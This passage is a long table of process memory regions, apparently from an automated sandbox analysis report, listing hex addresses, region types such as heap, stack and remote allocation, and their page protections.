page read and write
|
||
|
20D1673F000
|
heap
|
page read and write
|
||
|
20D1680E000
|
heap
|
page read and write
|
||
|
20D16742000
|
heap
|
page read and write
|
||
|
4670000
|
direct allocation
|
page read and write
|
||
|
2AAC000
|
stack
|
page read and write
|
||
|
20D165FB000
|
heap
|
page read and write
|
||
|
2790000
|
heap
|
page read and write
|
||
|
20D1671B000
|
heap
|
page read and write
|
||
|
75FC000
|
heap
|
page read and write
|
||
|
20D165DF000
|
heap
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
20D169E1000
|
heap
|
page read and write
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
A8E000
|
unkown
|
page readonly
|
||
|
4730000
|
heap
|
page read and write
|
||
|
20D167DD000
|
heap
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
20D165FB000
|
heap
|
page read and write
|
||
|
20D1663A000
|
heap
|
page read and write
|
||
|
20D14881000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7DB1000
|
heap
|
page read and write
|
||
|
20D166F1000
|
heap
|
page read and write
|
||
|
20D16700000
|
heap
|
page read and write
|
||
|
ED0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FC480000
|
heap
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
20D167E0000
|
heap
|
page read and write
|
||
|
7EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7060000
|
heap
|
page read and write
|
||
|
46F0000
|
direct allocation
|
page read and write
|
||
|
20D1673C000
|
heap
|
page read and write
|
||
|
43A2000
|
heap
|
page read and write
|
||
|
2F00000
|
direct allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FAAC8000
|
heap
|
page read and write
|
||
|
25E6560D000
|
heap
|
page read and write
|
||
|
20D16630000
|
heap
|
page read and write
|
||
|
20D165E7000
|
heap
|
page read and write
|
||
|
4880000
|
heap
|
page read and write
|
||
|
20D1684E000
|
heap
|
page read and write
|
||
|
1ED03F3B000
|
heap
|
page read and write
|
||
|
20D1673F000
|
heap
|
page read and write
|
||
|
65FAD3C000
|
stack
|
page read and write
|
||
|
221E58B000
|
stack
|
page read and write
|
||
|
20D14AF0000
|
heap
|
page read and write
|
||
|
1ED03E20000
|
heap
|
page read and write
|
||
|
75A4000
|
heap
|
page read and write
|
||
|
20D16742000
|
heap
|
page read and write
|
||
|
77E000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
15681E43000
|
trusted library allocation
|
page read and write
|
||
|
25E6560B000
|
heap
|
page read and write
|
||
|
A81000
|
unkown
|
page execute read
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1685D000
|
heap
|
page read and write
|
||
|
3029000
|
direct allocation
|
page execute and read and write
|
||
|
6B20000
|
direct allocation
|
page read and write
|
||
|
221D93B000
|
stack
|
page read and write
|
||
|
20D16BD0000
|
heap
|
page read and write
|
||
|
744B000
|
stack
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1673C000
|
heap
|
page read and write
|
||
|
7DD7000
|
stack
|
page read and write
|
||
|
3AA6000
|
unclassified section
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
15680899000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7F32000
|
heap
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
1FD7C000
|
stack
|
page read and write
|
||
|
20D16591000
|
heap
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
EF0000
|
heap
|
page read and write
|
||
|
156FAB68000
|
heap
|
page read and write
|
||
|
4A4C000
|
stack
|
page read and write
|
||
|
A3A000
|
stack
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
|
1290000
|
heap
|
page read and write
|
||
|
6CE0000
|
heap
|
page read and write
|
||
|
20D14905000
|
heap
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
15681DD1000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FCBE0000
|
heap
|
page read and write
|
||
|
20D167EF000
|
heap
|
page read and write
|
||
|
20D14880000
|
heap
|
page read and write
|
||
|
156FCD5D000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
4A8C000
|
stack
|
page read and write
|
||
|
15681A57000
|
trusted library allocation
|
page read and write
|
||
|
1ED05ABE000
|
trusted library allocation
|
page read and write
|
||
|
20D165BD000
|
heap
|
page read and write
|
||
|
2898000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
458D000
|
stack
|
page read and write
|
||
|
28D7000
|
heap
|
page read and write
|
||
|
20D167C8000
|
heap
|
page read and write
|
||
|
20D167B1000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D165AA000
|
heap
|
page read and write
|
||
|
20D16B38000
|
heap
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
2632B5B0000
|
heap
|
page read and write
|
||
|
3BAADFF000
|
stack
|
page read and write
|
||
|
43C0000
|
trusted library allocation
|
page read and write
|
||
|
2AF8000
|
trusted library allocation
|
page read and write
|
||
|
6FA000
|
heap
|
page read and write
|
||
|
10DA000
|
heap
|
page read and write
|
||
|
20D14858000
|
heap
|
page read and write
|
||
|
156FA9F0000
|
heap
|
page read and write
|
||
|
7FFD34792000
|
trusted library allocation
|
page read and write
|
||
|
1FF3E000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
4430000
|
heap
|
page read and write
|
||
|
3BAB1FE000
|
stack
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
75C4000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16638000
|
heap
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
200F0000
|
direct allocation
|
page execute and read and write
|
||
|
2F1C000
|
unkown
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FAA00000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
54F9000
|
trusted library allocation
|
page read and write
|
||
|
20D1671F000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
20D167C5000
|
heap
|
page read and write
|
||
|
7F42000
|
heap
|
page read and write
|
||
|
7FFD347AB000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
6FA000
|
heap
|
page read and write
|
||
|
6AE0000
|
direct allocation
|
page read and write
|
||
|
3304000
|
unkown
|
page read and write
|
||
|
156808A5000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
46C0000
|
direct allocation
|
page read and write
|
||
|
20D16853000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2B51000
|
heap
|
page read and write
|
||
|
20D16745000
|
heap
|
page read and write
|
||
|
20D1659C000
|
heap
|
page read and write
|
||
|
25E65600000
|
heap
|
page read and write
|
||
|
20D1490B000
|
heap
|
page read and write
|
||
|
20D16750000
|
heap
|
page read and write
|
||
|
75AF000
|
heap
|
page read and write
|
||
|
761B000
|
heap
|
page read and write
|
||
|
20D16700000
|
heap
|
page read and write
|
||
|
1437000
|
heap
|
page read and write
|
||
|
68F1FFF000
|
stack
|
page read and write
|
||
|
8450000
|
direct allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
20D1659D000
|
heap
|
page read and write
|
||
|
20D165D1000
|
heap
|
page read and write
|
||
|
1F98E000
|
stack
|
page read and write
|
||
|
1220000
|
unkown
|
page read and write
|
||
|
25E655F5000
|
heap
|
page read and write
|
||
|
A81000
|
unkown
|
page execute read
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
4D90000
|
trusted library allocation
|
page read and write
|
||
|
3BAA509000
|
stack
|
page read and write
|
||
|
43E0000
|
heap
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
7601000
|
heap
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
20D169C0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
A50000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D165B4000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
26329C85000
|
heap
|
page read and write
|
||
|
20D1676A000
|
heap
|
page read and write
|
||
|
20D16774000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
F77000
|
system
|
page execute and read and write
|
||
|
20D165B7000
|
heap
|
page read and write
|
||
|
1FD3C000
|
stack
|
page read and write
|
||
|
221D57E000
|
stack
|
page read and write
|
||
|
4660000
|
direct allocation
|
page read and write
|
||
|
1568048E000
|
trusted library allocation
|
page read and write
|
||
|
276E000
|
stack
|
page read and write
|
||
|
8180000
|
trusted library allocation
|
page execute and read and write
|
||
|
697E000
|
stack
|
page read and write
|
||
|
20D16613000
|
heap
|
page read and write
|
||
|
20D1663A000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
27A9000
|
heap
|
page read and write
|
||
|
20D1673B000
|
heap
|
page read and write
|
||
|
8470000
|
direct allocation
|
page read and write
|
||
|
2A73000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D5C000
|
unkown
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
2B90000
|
direct allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
20D167A1000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
BF1000
|
unkown
|
page readonly
|
||
|
20D16C71000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
295B000
|
stack
|
page read and write
|
||
|
20D16C71000
|
heap
|
page read and write
|
||
|
11D0000
|
unkown
|
page readonly
|
||
|
54E1000
|
trusted library allocation
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
428E000
|
stack
|
page read and write
|
||
|
20D169C0000
|
heap
|
page read and write
|
||
|
7FFD3484C000
|
trusted library allocation
|
page execute and read and write
|
||
|
15680471000
|
trusted library allocation
|
page read and write
|
||
|
1437000
|
heap
|
page read and write
|
||
|
446E000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1ED05AC4000
|
trusted library allocation
|
page read and write
|
||
|
20D1659A000
|
heap
|
page read and write
|
||
|
69FF000
|
stack
|
page read and write
|
||
|
20D1673C000
|
heap
|
page read and write
|
||
|
20D169E1000
|
heap
|
page read and write
|
||
|
4367000
|
heap
|
page read and write
|
||
|
358000
|
stack
|
page read and write
|
||
|
5778000
|
trusted library allocation
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
4DBC000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1ED05760000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
2EEE000
|
stack
|
page read and write
|
||
|
7EBE000
|
stack
|
page read and write
|
||
|
4E6E000
|
stack
|
page read and write
|
||
|
7DB7000
|
heap
|
page read and write
|
||
|
20D16700000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D16753000
|
heap
|
page read and write
|
||
|
DC0000
|
unkown
|
page readonly
|
||
|
1ED03D88000
|
system
|
page execute and read and write
|
||
|
221D27E000
|
stack
|
page read and write
|
||
|
4460000
|
heap
|
page readonly
|
||
|
43C9000
|
heap
|
page read and write
|
||
|
1ED03D40000
|
system
|
page execute and read and write
|
||
|
A80000
|
unkown
|
page readonly
|
||
|
20D16753000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
221D47F000
|
stack
|
page read and write
|
||
|
D00000
|
unkown
|
page readonly
|
||
|
221CF73000
|
stack
|
page read and write
|
||
|
20D1671B000
|
heap
|
page read and write
|
||
|
75E4000
|
heap
|
page read and write
|
||
|
26329C30000
|
heap
|
page read and write
|
||
|
20D1673C000
|
heap
|
page read and write
|
||
|
7E7D000
|
stack
|
page read and write
|
||
|
2A3F000
|
stack
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7DC4000
|
heap
|
page read and write
|
||
|
20D1675F000
|
heap
|
page read and write
|
||
|
156FCB85000
|
heap
|
page read and write
|
||
|
ED0000
|
heap
|
page read and write
|
||
|
68F0000
|
heap
|
page execute and read and write
|
||
|
7F96000
|
heap
|
page read and write
|
||
|
43F7000
|
unkown
|
page execute and read and write
|
||
|
156FAA8D000
|
heap
|
page read and write
|
||
|
1ED05730000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D169C4000
|
heap
|
page read and write
|
||
|
15681CF4000
|
trusted library allocation
|
page read and write
|
||
|
D2C000
|
heap
|
page read and write
|
||
|
2B90000
|
direct allocation
|
page read and write
|
||
|
15681DD9000
|
trusted library allocation
|
page read and write
|
||
|
20D14AFD000
|
heap
|
page read and write
|
||
|
BC0000
|
unkown
|
page readonly
|
||
|
20D165B7000
|
heap
|
page read and write
|
||
|
50CF000
|
stack
|
page read and write
|
||
|
BC0000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FCAD7000
|
heap
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2B2E000
|
stack
|
page read and write
|
||
|
20D1660B000
|
heap
|
page read and write
|
||
|
1ED03F3F000
|
heap
|
page read and write
|
||
|
4DA6000
|
trusted library allocation
|
page read and write
|
||
|
26329C90000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
3BAAAFE000
|
stack
|
page read and write
|
||
|
20D16816000
|
heap
|
page read and write
|
||
|
20D165B2000
|
heap
|
page read and write
|
||
|
20D1663A000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
75BD000
|
heap
|
page read and write
|
||
|
A97000
|
unkown
|
page readonly
|
||
|
9C0000
|
unkown
|
page readonly
|
||
|
1060000
|
unkown
|
page read and write
|
||
|
2D95000
|
heap
|
page read and write
|
||
|
18C1000
|
unkown
|
page readonly
|
||
|
4EAF000
|
stack
|
page read and write
|
||
|
68F5000
|
heap
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1530000
|
unkown
|
page readonly
|
||
|
156FAAF2000
|
heap
|
page read and write
|
||
|
2BC7000
|
heap
|
page read and write
|
||
|
1568084A000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D14931000
|
heap
|
page read and write
|
||
|
20D167CD000
|
heap
|
page read and write
|
||
|
2C7F000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
203C1000
|
direct allocation
|
page execute and read and write
|
||
|
3BAAEFC000
|
stack
|
page read and write
|
||
|
156FCD43000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
20D16806000
|
heap
|
page read and write
|
||
|
6AF0000
|
direct allocation
|
page read and write
|
||
|
20D165EA000
|
heap
|
page read and write
|
||
|
544C000
|
stack
|
page read and write
|
||
|
2C42000
|
unkown
|
page read and write
|
||
|
43B4000
|
heap
|
page read and write
|
||
|
4DCB000
|
stack
|
page read and write
|
||
|
15681DEC000
|
trusted library allocation
|
page read and write
|
||
|
20D16B38000
|
heap
|
page read and write
|
||
|
31D1000
|
direct allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1683E000
|
heap
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
10FC000
|
stack
|
page read and write
|
||
|
9D0000
|
unkown
|
page readonly
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16743000
|
heap
|
page read and write
|
||
|
336C000
|
unclassified section
|
page read and write
|
||
|
20D16A98000
|
heap
|
page read and write
|
||
|
2EC0000
|
unkown
|
page readonly
|
||
|
4F2F000
|
stack
|
page read and write
|
||
|
20D16794000
|
heap
|
page read and write
|
||
|
781D000
|
stack
|
page read and write
|
||
|
650E000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2E40000
|
remote allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2999000
|
stack
|
page read and write
|
||
|
221D5FE000
|
stack
|
page read and write
|
||
|
15681E5B000
|
trusted library allocation
|
page read and write
|
||
|
1ED03F17000
|
heap
|
page read and write
|
||
|
AD0000
|
trusted library allocation
|
page read and write
|
||
|
43BE000
|
heap
|
page read and write
|
||
|
1ED0590E000
|
trusted library allocation
|
page read and write
|
||
|
46B0000
|
direct allocation
|
page read and write
|
||
|
A80000
|
unkown
|
page readonly
|
||
|
8420000
|
direct allocation
|
page read and write
|
||
|
442E000
|
stack
|
page read and write
|
||
|
221D63E000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
221E50D000
|
stack
|
page read and write
|
||
|
2D6E000
|
stack
|
page read and write
|
||
|
68CF000
|
stack
|
page read and write
|
||
|
1ED05A00000
|
trusted library allocation
|
page read and write
|
||
|
4532000
|
trusted library allocation
|
page read and write
|
||
|
31B000
|
stack
|
page read and write
|
||
|
20D147E0000
|
heap
|
page read and write
|
||
|
4A0F000
|
stack
|
page read and write
|
||
|
1FC70000
|
remote allocation
|
page read and write
|
||
|
7DC0000
|
heap
|
page read and write
|
||
|
DB0000
|
unkown
|
page readonly
|
||
|
4E0E000
|
stack
|
page read and write
|
||
|
20D16638000
|
heap
|
page read and write
|
||
|
6E8000
|
heap
|
page read and write
|
||
|
20D166C2000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
221D9BE000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
578F000
|
stack
|
page read and write
|
||
|
A81000
|
unkown
|
page execute read
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
7197000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2780000
|
trusted library section
|
page read and write
|
||
|
20D16590000
|
heap
|
page read and write
|
||
|
20D167F2000
|
heap
|
page read and write
|
||
|
7F9C000
|
heap
|
page read and write
|
||
|
156FCC00000
|
heap
|
page read and write
|
||
|
20D165C5000
|
heap
|
page read and write
|
||
|
F83000
|
system
|
page execute and read and write
|
||
|
20D16743000
|
heap
|
page read and write
|
||
|
3930000
|
remote allocation
|
page execute and read and write
|
||
|
6F0E000
|
stack
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
1ED05910000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1683B000
|
heap
|
page read and write
|
||
|
156FC440000
|
trusted library allocation
|
page read and write
|
||
|
2AA5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DD2000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1220000
|
unkown
|
page read and write
|
||
|
46A0000
|
direct allocation
|
page read and write
|
||
|
20D1674C000
|
heap
|
page read and write
|
||
|
20D1671B000
|
heap
|
page read and write
|
||
|
20D1660A000
|
heap
|
page read and write
|
||
|
DB0000
|
unkown
|
page readonly
|
||
|
C03000
|
heap
|
page read and write
|
||
|
7133000
|
heap
|
page read and write
|
||
|
15680086000
|
trusted library allocation
|
page read and write
|
||
|
20D16843000
|
heap
|
page read and write
|
||
|
7FFD3479D000
|
trusted library allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
77DC000
|
stack
|
page read and write
|
||
|
20D16624000
|
heap
|
page read and write
|
||
|
156804F5000
|
trusted library allocation
|
page read and write
|
||
|
15680001000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1211000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
50D000
|
stack
|
page read and write
|
||
|
20D167A4000
|
heap
|
page read and write
|
||
|
1ED03D84000
|
system
|
page execute and read and write
|
||
|
20D165C6000
|
heap
|
page read and write
|
||
|
33CE000
|
unkown
|
page read and write
|
||
|
27F0000
|
trusted library section
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7634000
|
heap
|
page read and write
|
||
|
9C0000
|
unkown
|
page readonly
|
||
|
221D5F8000
|
stack
|
page read and write
|
||
|
20D167F7000
|
heap
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FCD45000
|
heap
|
page read and write
|
||
|
6CD0000
|
heap
|
page read and write
|
||
|
323D000
|
stack
|
page read and write
|
||
|
7F160000
|
trusted library allocation
|
page execute and read and write
|
||
|
13C0000
|
unkown
|
page read and write
|
||
|
FDA000
|
system
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
156FC450000
|
heap
|
page readonly
|
||
|
20D16799000
|
heap
|
page read and write
|
||
|
4330000
|
heap
|
page read and write
|
||
|
25E655F0000
|
heap
|
page read and write
|
||
|
3DEC000
|
system
|
page read and write
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
A8E000
|
unkown
|
page readonly
|
||
|
45CF000
|
stack
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
25E65590000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
BB0000
|
unkown
|
page readonly
|
||
|
6EE000
|
heap
|
page read and write
|
||
|
1ED05903000
|
trusted library allocation
|
page read and write
|
||
|
1ED03D86000
|
system
|
page execute and read and write
|
||
|
20D16700000
|
heap
|
page read and write
|
||
|
309E000
|
direct allocation
|
page execute and read and write
|
||
|
18B000
|
stack
|
page read and write
|
||
|
1530000
|
unkown
|
page readonly
|
||
|
1FBCD000
|
stack
|
page read and write
|
||
|
1568048A000
|
trusted library allocation
|
page read and write
|
||
|
7F00000
|
heap
|
page read and write
|
||
|
20D14928000
|
heap
|
page read and write
|
||
|
20D165F2000
|
heap
|
page read and write
|
||
|
15690021000
|
trusted library allocation
|
page read and write
|
||
|
1568145A000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1FEA4000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1568082F000
|
trusted library allocation
|
page read and write
|
||
|
156806B0000
|
trusted library allocation
|
page read and write
|
||
|
688E000
|
stack
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
1FC70000
|
remote allocation
|
page read and write
|
||
|
15681F7C000
|
trusted library allocation
|
page read and write
|
||
|
1FD81000
|
heap
|
page read and write
|
||
|
4700000
|
direct allocation
|
page read and write
|
||
|
A70000
|
unkown
|
page readonly
|
||
|
156FAAF8000
|
heap
|
page read and write
|
||
|
203BD000
|
direct allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7160000
|
trusted library allocation
|
page read and write
|
||
|
1280000
|
unkown
|
page readonly
|
||
|
43CE000
|
stack
|
page read and write
|
||
|
A80000
|
unkown
|
page readonly
|
||
|
20D169D8000
|
heap
|
page read and write
|
||
|
1568086D000
|
trusted library allocation
|
page read and write
|
||
|
156902F5000
|
trusted library allocation
|
page read and write
|
||
|
2A90000
|
trusted library allocation
|
page read and write
|
||
|
4650000
|
direct allocation
|
page read and write
|
||
|
930000
|
heap
|
page read and write
|
||
|
20D167C0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
4394000
|
system
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
156FCD16000
|
heap
|
page read and write
|
||
|
11D0000
|
unkown
|
page readonly
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
43C9000
|
heap
|
page read and write
|
||
|
BAC000
|
stack
|
page read and write
|
||
|
6C4D000
|
stack
|
page read and write
|
||
|
156902E7000
|
trusted library allocation
|
page read and write
|
||
|
20D14890000
|
heap
|
page read and write
|
||
|
20D16773000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16617000
|
heap
|
page read and write
|
||
|
20D16A47000
|
heap
|
page read and write
|
||
|
7ED0000
|
heap
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16597000
|
heap
|
page read and write
|
||
|
156FC490000
|
trusted library allocation
|
page read and write
|
||
|
20D16803000
|
heap
|
page read and write
|
||
|
20D1663A000
|
heap
|
page read and write
|
||
|
20D16722000
|
heap
|
page read and write
|
||
|
7F8A000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
20D16A48000
|
heap
|
page read and write
|
||
|
20D16743000
|
heap
|
page read and write
|
||
|
83E0000
|
trusted library allocation
|
page read and write
|
||
|
3CD2000
|
system
|
page read and write
|
||
|
156FCAE0000
|
heap
|
page read and write
|
||
|
20D16723000
|
heap
|
page read and write
|
||
|
20D1675B000
|
heap
|
page read and write
|
||
|
833C000
|
stack
|
page read and write
|
||
|
156FCD9C000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D165A5000
|
heap
|
page read and write
|
||
|
15681DB2000
|
trusted library allocation
|
page read and write
|
||
|
7606000
|
heap
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D165DE000
|
heap
|
page read and write
|
||
|
272D000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
DF0000
|
unkown
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
4860000
|
heap
|
page read and write
|
||
|
15680883000
|
trusted library allocation
|
page read and write
|
||
|
26329C98000
|
heap
|
page read and write
|
||
|
20D16745000
|
heap
|
page read and write
|
||
|
20D16723000
|
heap
|
page read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
2B1D000
|
heap
|
page read and write
|
||
|
20D165B6000
|
heap
|
page read and write
|
||
|
7638000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D165B8000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
A95000
|
unkown
|
page read and write
|
||
|
4417000
|
heap
|
page read and write
|
||
|
15690001000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
3BAA8FF000
|
stack
|
page read and write
|
||
|
20D16638000
|
heap
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
221D4FE000
|
stack
|
page read and write
|
||
|
2A80000
|
trusted library allocation
|
page read and write
|
||
|
4417000
|
heap
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page execute and read and write
|
||
|
3BAB3FB000
|
stack
|
page read and write
|
||
|
7F17000
|
heap
|
page read and write
|
||
|
EE0000
|
unkown
|
page read and write
|
||
|
1FA0D000
|
stack
|
page read and write
|
||
|
460E000
|
stack
|
page read and write
|
||
|
20D16833000
|
heap
|
page read and write
|
||
|
BE0000
|
unkown
|
page read and write
|
||
|
156FAA70000
|
heap
|
page read and write
|
||
|
6EE000
|
heap
|
page read and write
|
||
|
20D16939000
|
heap
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
20D165A3000
|
heap
|
page read and write
|
||
|
7069000
|
heap
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
20D165C6000
|
heap
|
page read and write
|
||
|
1050000
|
unkown
|
page read and write
|
||
|
75F6000
|
heap
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
A51000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
1F930000
|
heap
|
page read and write
|
||
|
7665000
|
heap
|
